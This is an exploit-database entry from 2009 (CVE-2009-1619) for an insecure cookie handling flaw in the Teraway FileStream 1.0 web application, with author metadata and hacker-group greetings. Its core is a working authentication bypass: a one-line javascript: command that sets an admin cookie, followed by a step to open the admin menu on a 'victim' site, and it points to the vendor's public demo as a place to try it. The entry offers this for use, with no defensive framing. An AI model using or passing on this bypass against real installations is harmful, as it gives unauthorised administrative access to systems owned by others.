[] NeoSense

Teraway FileStream 1.0 - Insecure Cookie Handling

Author: ThE g0bL!N
type: webapps
platform: php
port: 
date_added: 2009-04-26 
date_updated:  
verified: 1 
codes: OSVDB-54101;CVE-2009-1619 
tags: 
aliases:  
screenshot_url:  
application_url: 

-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway FileStream 1.0
home:www.h4ckf0ru.com
Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae
Note: Ya Jma3a Ana AfLawi Horr
-------------------------------------
Teraway FileStream 1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twFSadmin=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/filestream/demo/login.asp


--------------------------------------------------
 Greetz to :
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone-  ZoRLu
And ALL Members Of anti-intruders.org
ALL My Friends (Dz)
[+]-------------------------------------[+]

# milw0rm.com [2009-04-27]